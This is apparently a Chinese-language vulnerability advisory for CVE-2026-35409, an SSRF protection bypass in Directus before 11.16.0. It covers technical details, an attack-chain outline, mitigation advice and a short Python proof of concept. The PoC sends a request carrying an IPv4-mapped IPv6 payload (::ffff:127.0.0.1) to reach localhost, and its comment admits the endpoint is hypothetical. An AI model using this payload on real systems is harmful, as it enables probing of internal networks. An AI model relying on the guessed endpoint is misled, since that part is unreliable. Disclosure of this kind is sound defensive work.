IPBUF安全漏洞报告
English
CVE-2026-35409 CVSS 7.7 高危

CVE-2026-35409 Directus SSRF保护绕过漏洞

披露日期: 2026-04-06

漏洞信息

漏洞编号
CVE-2026-35409
漏洞类型
SSRF (服务器端请求伪造)
CVSS评分
7.7 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Directus

相关标签

SSRFDirectusIPv6 BypassCWE-918

漏洞概述

Directus是一款用于管理SQL数据库内容的实时API和应用仪表板。在其11.16.0之前的版本中,存在服务器端请求伪造(SSRF)保护绕过漏洞。攻击者可利用IPv4映射的IPv6地址表示法绕过原有的IP地址验证机制,从而访问受限的本地或私有网络资源。该漏洞影响机密性,厂商已在11.16.0版本中修复此问题。

技术细节

该漏洞的根本原因在于Directus用于拦截本地和私有网络请求的IP地址验证机制存在逻辑缺陷。传统的SSRF防御通常通过检查目标IP是否位于私有地址段(如127.0.0.1、192.168.x.x等)来实现。然而,Directus在验证过程中未能正确识别IPv4映射的IPv6地址格式(例如::ffff:127.0.0.1或::ffff:192.168.1.1)。当攻击者构造包含此类IPv6格式的恶意请求时,底层的网络请求库往往能将其正确解析为对应的本地或内网IPv4地址,但应用层的校验逻辑却未能将其识别为受限地址。这种解析层面的不一致性导致了安全检查的绕过。攻击者利用此漏洞可诱导服务器向内部敏感服务发起请求,结合其他攻击链可能进一步威胁内网安全。鉴于CVSS评分为7.7(高危),且攻击复杂度低,该漏洞需引起高度重视。

攻击链分析

STEP 1
侦察
攻击者发现目标系统运行的是Directus且版本低于11.16.0。
STEP 2
构造Payload
攻击者构造包含IPv4映射IPv6地址(如::ffff:127.0.0.1)的恶意请求,旨在访问本地或内网资源。
STEP 3
发送请求
攻击者向Directus接口发送构造好的请求,试图触发SSRF。
STEP 4
绕过验证
服务器的IP地址验证机制未能识别IPv6格式的本地地址,允许请求通过。
STEP 5
执行攻击
服务器向内网或本地回环地址发起请求,攻击者获取敏感信息或进一步探测内网。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (Example of a vulnerable Directus instance) target_url = "http://vulnerable-directus-instance.com" # Payload: Using IPv4-mapped IPv6 address to bypass SSRF check and access localhost # Mapping 127.0.0.1 to IPv6 format: ::ffff:127.0.0.1 ssrf_payload = "http://[::ffff:127.0.0.1]:8080/admin" # Example endpoint that might be vulnerable (hypothetical based on product type) vulnerable_endpoint = f"{target_url}/items/proxy?url={ssrf_payload}" try: response = requests.get(vulnerable_endpoint) if response.status_code == 200: print("Potential SSRF bypass successful!") print("Response snippet:", response.text[:200]) else: print(f"Request failed with status code: {response.status_code}") except Exception as e: print(f"An error occurred: {e}")

影响范围

Directus < 11.16.0

防御指南

临时缓解措施
建议立即升级至11.16.0或更高版本。如无法立即升级,应在网络层面通过防火墙规则阻断服务器对非必要外网及内网敏感IP段(如127.0.0.1、10.0.0.0/8等)的访问,或部署WAF规则拦截包含IPv6格式地址的恶意请求。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表